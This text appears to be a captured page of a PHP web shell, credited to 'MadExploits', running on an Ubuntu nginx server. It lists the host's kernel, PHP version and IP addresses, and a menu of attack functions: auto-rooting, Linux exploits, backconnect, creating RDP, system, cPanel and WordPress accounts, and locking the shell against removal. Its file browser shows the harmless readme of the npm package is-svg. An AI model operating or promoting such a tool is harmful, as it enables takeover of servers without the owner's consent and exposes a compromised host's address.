Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
is-svg /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
567
B
-rw-r--r--
license
1.08
KB
-rw-r--r--
package.json
851
B
-rw-r--r--
readme.md
822
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# is-svg [](https://travis-ci.org/sindresorhus/is-svg) > Check if a string or buffer is [SVG](https://en.wikipedia.org/wiki/Scalable_Vector_Graphics) ## Install ``` $ npm install is-svg ``` ## Usage ```js const isSvg = require('is-svg'); isSvg('<svg xmlns="http://www.w3.org/2000/svg"><path fill="#00CD9F"/></svg>'); //=> true ``` ## Edge cases This module performs a quick-and-dirty check. It's fast, but in certain cases it will give incorrect results. - Returns `true` for an SVG-like string that isn't well-formed or valid: `<svg><div></svg>` If you want to make certain that your SVG is *valid*, try parsing it with [libxmljs](https://github.com/polotek/libxmljs). ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Close